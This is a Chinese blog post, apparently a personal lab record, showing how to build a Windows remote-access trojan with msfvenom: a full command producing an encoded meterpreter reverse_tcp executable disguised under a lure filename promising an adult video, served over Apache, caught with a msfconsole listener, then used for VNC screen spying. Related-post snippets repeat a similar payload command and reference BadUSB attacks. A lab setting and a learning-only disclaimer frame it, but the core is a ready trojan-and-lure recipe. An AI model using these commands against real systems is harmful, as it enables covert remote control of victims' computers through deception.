记一次利用msfvenom制作windows恶意软件实战记录

于 2024-06-14 10:03:54 发布
阅读量579 收藏 4
点赞数 9
分类专栏: 杂个人漏洞实战练习记录 文章标签: windows web安全 网络安全 msfvenom msfsonole 恶意软件实战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wdnmddbl/article/details/139673604
版权

杂个人漏洞实战练习记录

记一次利用msfvenom制作windows恶意软件实战记录

文章目录

前言

路漫漫其修远兮,吾将上下而求索。
本文涉及以下知识点,去引用文章学习即可:
链接: 我是一个知识点
本文旨在网络安全学习记录,请勿用于任何黑客攻击,产生任何后果皆与笔者无关,后果自负。

一、实验过程

攻击机:kali虚拟机:192.168.66.74
靶机:win7虚拟机:192.168.66.58

1.使用msfvenom制作恶意软件如下图所示:

使用命令:

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.66.74 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/点我看深田视频.exe

其中命令

-a:指系统架构如x86,x86_64,x64
-platform:指操作系统
-p:指payload
-b:指去掉坏字符 \x代表16进制 00 代表空字符
-e:指定编码
-i:指编码次数
-f:指定输出格式
-o:指定输出路径

在这里插入图片描述

2.使用命令service apache2 start开启apache服务,用靶机下载恶意程序,如下所示:

在这里插入图片描述在这里插入图片描述

3.进入msfconsole,启用监听,设置payload,如下图所示:

在这里插入图片描述

4.攻击机运行run,靶机点击运行程序看深田视频:),攻击成功,如下图所示:

在这里插入图片描述
在这里插入图片描述

5.在攻击中启用vnc,成功监听靶机界面,更多渗透操作请看文章开头引用文章如下图所示:

在这里插入图片描述

在这里插入图片描述

总结

大概思路和涉及的知识点(这里我一律复制网上师傅总结的即可,网上的师傅们总结的很完美,我就不东施效颦)

思路:
学习后渗透知识点

Rum:)
关注
专栏目录
内网渗透的一次记录 作者:Jaky.pdf
04-08
本文基于《内网渗透的一次记录》这一实战案例,详细解析了内网渗透的具体步骤和技术要点。 #### 二、环境准备 在进行内网渗透之前,需要做好充分的准备工作。主要包括生成远控木马、部署木马以及设置监听环境等...
通过msf渗透win10
qq_63651088的博客
03-22 1625
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
Windows上安装Metasploit-(msfconsole
m0_73135216的博客
05-12 2605
平时使用metasploit一般是在kali里面,有时候使用非常的麻烦,其实Metasploit也是支持Windows的,关于很多metasploit的方法,作者觉得有点小麻烦,这里给大家带来一种最简单的方法。任务二 安装metasploit (步骤非常简单)看到这一步说明安装成功了,安装过程比较缓慢,请不要安装到C盘!这里已经运行成功了,看到别的文章要设置环境变量,这里比较简单,就没有做过多的操作,如果安装有问题,就去设置环境变量,也有可能是因为metasploit版本问题和系统版本问题。
msfconsole攻击win10及简陋版
最新发布
极客云曦前端
05-29 342
该错误提示表明在Metasploit中执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole
关于MSF在window10系统上安装完毕cmd里读取不到的问题
weixin_44045348的博客
11-04 1141
msf在window10系统下安装后读取不出的问题
kali攻击命令大全_利用msf攻击win10
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
MSFVENOM_windows_payload_creator_V1.0:V1.0
05-03
MSFVENOM_windows_payload_creator_V1.0 V1.0 MSFVENOM Windows Payload Builder是一个简单的perl脚本,旨在简化创建可自定义的Windows可执行文件的任务。 该脚本使用Shikata_na_gai mfsvenon模块创建有效负载可执行...
msfvenom获取shell
01-03
msfvenom -a x86 –platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -opayload.exe mac: msfvenom -a x86 –platform ...
msfvenom常用生成payload命令(第十课)1
08-03
`msfvenom`是Metasploit框架中的一个工具,主要用于生成恶意载荷(payloads)。它可以帮助安全研究人员和渗透测试人员创建用于测试系统漏洞的定制化恶意代码。在进行APT攻击与防御的研究时,了解如何使用`msfvenom`...
msfconsole制作windows木马并成功获取shell
qq_56228347的博客
11-22 3666
msfconsole制作windows木马并上线获取控制权限
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
badusb攻击windows10(msfconsole版)
algae
04-27 1455
准备badusbArduino下载软件点击下载运行软件TIM截图20190305105048.png在工具菜单中 选择,选择badusb的端口和开发版。TIM截图20190304122136.png注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始...
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9752
metasploit比较经典的使用实例,ms08-067 netapi
实战:入侵win10
zhaoyuhan1124的博客
08-29 1万+
简介 网上看到有人发布的关于win10的入侵流程,正好手上有两台电脑,大致说一下我的思路吧 原理 原理其实都是差不多的,即想办法把你的后门植入系统,然后远程控制。随着win10越来越安全,如果对方防备完善的话, 防火墙全开,远程端口默认禁止,附带杀毒软件,那么很难不通过物理接触感染系统。这里的思路利用win10的secure boot 提权然后拿到Administrator帐号进行入侵 步骤 简要...
kali:用TheFatRat攻击win10
我的学习笔记
02-28 7344
参考视频:https://www.youtube.com/watch?v=bFXVAXRXE9Qcd /tmp git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat cd setup chmod +x setup.sh ./setup.sh chmod +x powerfull...
使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
D-river博客
10-11 4万+
强大的metasploit平台加入了永恒之蓝漏洞的利用exploit,可以对ms17-010漏洞进行利用,支持对windows7和windows 2008 R2。
Metasploit 和 Postgresql在Windows10 下 环境安装
weixin_42177011的博客
05-11 5601
Metasploit 
win10 永恒之黑复现
niqiu320的博客
05-31 1863
永恒之黑复现 一:漏洞简介 漏洞原理: SMB远程代码执行漏洞 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。 Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数
msfvenom 生成windows的exe木马
06-02
要生成Windows的exe木马,可以使用msfvenom命令,如下所示: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=<attacker port> -f exe > payload.exe ``` 其中,`windows/meterpreter...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值